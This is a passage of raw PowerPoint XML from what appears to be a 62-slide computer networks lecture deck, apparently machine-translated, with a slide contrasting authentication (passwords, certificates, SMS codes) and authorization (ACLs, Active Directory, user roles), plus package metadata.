            <a:endParaRPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextShape 2" hidden="0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="4016160" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="339840" algn="l"/>
                <a:tab pos="444600" algn="l"/>
                <a:tab pos="893879" algn="l"/>
                <a:tab pos="1343160" algn="l"/>
                <a:tab pos="1792440" algn="l"/>
                <a:tab pos="2241720" algn="l"/>
                <a:tab pos="2690640" algn="l"/>
                <a:tab pos="3139920" algn="l"/>
                <a:tab pos="3589200" algn="l"/>
                <a:tab pos="4038480" algn="l"/>
                <a:tab pos="4487760" algn="l"/>
                <a:tab pos="4937039" algn="l"/>
                <a:tab pos="5386320" algn="l"/>
                <a:tab pos="5835600" algn="l"/>
                <a:tab pos="6284880" algn="l"/>
                <a:tab pos="6734160" algn="l"/>
                <a:tab pos="7183440" algn="l"/>
                <a:tab pos="7632720" algn="l"/>
                <a:tab pos="8082000" algn="l"/>
                <a:tab pos="8531280" algn="l"/>
                <a:tab pos="8980560" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="CE181E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Checking that you are really you</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="350325" indent="-349965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:tabLst>
                <a:tab pos="339840" algn="l"/>
                <a:tab pos="444600" algn="l"/>
                <a:tab pos="893879" algn="l"/>
                <a:tab pos="1343160" algn="l"/>
                <a:tab pos="1792440" algn="l"/>
                <a:tab pos="2241720" algn="l"/>
                <a:tab pos="2690640" algn="l"/>
                <a:tab pos="3139920" algn="l"/>
                <a:tab pos="3589200" algn="l"/>
                <a:tab pos="4038480" algn="l"/>
                <a:tab pos="4487760" algn="l"/>
                <a:tab pos="4937039" algn="l"/>
                <a:tab pos="5386320" algn="l"/>
                <a:tab pos="5835600" algn="l"/>
                <a:tab pos="6284880" algn="l"/>
                <a:tab pos="6734160" algn="l"/>
                <a:tab pos="7183440" algn="l"/>
                <a:tab pos="7632720" algn="l"/>
                <a:tab pos="8082000" algn="l"/>
                <a:tab pos="8531280" algn="l"/>
                <a:tab pos="8980560" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Login/Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="350325" indent="-349965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:tabLst>
                <a:tab pos="339840" algn="l"/>
                <a:tab pos="444600" algn="l"/>
                <a:tab pos="893879" algn="l"/>
                <a:tab pos="1343160" algn="l"/>
                <a:tab pos="1792440" algn="l"/>
                <a:tab pos="2241720" algn="l"/>
                <a:tab pos="2690640" algn="l"/>
                <a:tab pos="3139920" algn="l"/>
                <a:tab pos="3589200" algn="l"/>
                <a:tab pos="4038480" algn="l"/>
                <a:tab pos="4487760" algn="l"/>
                <a:tab pos="4937039" algn="l"/>
                <a:tab pos="5386320" algn="l"/>
                <a:tab pos="5835600" algn="l"/>
                <a:tab pos="6284880" algn="l"/>
                <a:tab pos="6734160" algn="l"/>
                <a:tab pos="7183440" algn="l"/>
                <a:tab pos="7632720" algn="l"/>
                <a:tab pos="8082000" algn="l"/>
                <a:tab pos="8531280" algn="l"/>
                <a:tab pos="8980560" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="350325" indent="-349965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:tabLst>
                <a:tab pos="339840" algn="l"/>
                <a:tab pos="444600" algn="l"/>
                <a:tab pos="893879" algn="l"/>
                <a:tab pos="1343160" algn="l"/>
                <a:tab pos="1792440" algn="l"/>
                <a:tab pos="2241720" algn="l"/>
                <a:tab pos="2690640" algn="l"/>
                <a:tab pos="3139920" algn="l"/>
                <a:tab pos="3589200" algn="l"/>
                <a:tab pos="4038480" algn="l"/>
                <a:tab pos="4487760" algn="l"/>
                <a:tab pos="4937039" algn="l"/>
                <a:tab pos="5386320" algn="l"/>
                <a:tab pos="5835600" algn="l"/>
                <a:tab pos="6284880" algn="l"/>
                <a:tab pos="6734160" algn="l"/>
                <a:tab pos="7183440" algn="l"/>
                <a:tab pos="7632720" algn="l"/>
                <a:tab pos="8082000" algn="l"/>
                <a:tab pos="8531280" algn="l"/>
                <a:tab pos="8980560" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Codes via SMS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextShape 3" hidden="0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4673520" y="1719360"/>
            <a:ext cx="4016160" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="CE181E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Checking whether you have permissions to access the resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Access control lists (ACLs) on the file systems, Active Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>User role systems </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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_rels/theme3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"></Relationships>
</file>

<file path=ppt/theme/_rels/theme4.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3.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4.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ONLYOFFICE/6.3.1.56</Application>
  <DocSecurity>0</DocSecurity>
  <PresentationFormat/>
  <Paragraphs>0</Paragraphs>
  <Slides>62</Slides>
  <Notes>62</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>2</MMClips>
  <ScaleCrop>0</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="65" baseType="lpstr">
      <vt:lpstr>Theme 1</vt:lpstr>
      <vt:lpstr>Theme 2</vt:lpstr>
      <vt:lpstr>Theme 3</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Компьютерные сети??</dc:title>
  <dc:subject/>
  <dc:creator>Yandex.Translate</dc:creator>
  <cp:keywords/>
  <dc:description>Translated with Yandex.Translate</dc:description>
  <dc:identifier/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <cp:revision>1001</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T06:01:11Z</dcterms:modified>
  <cp:category/>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63</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63</vt:i4>
  </property>
</Properties>
</file>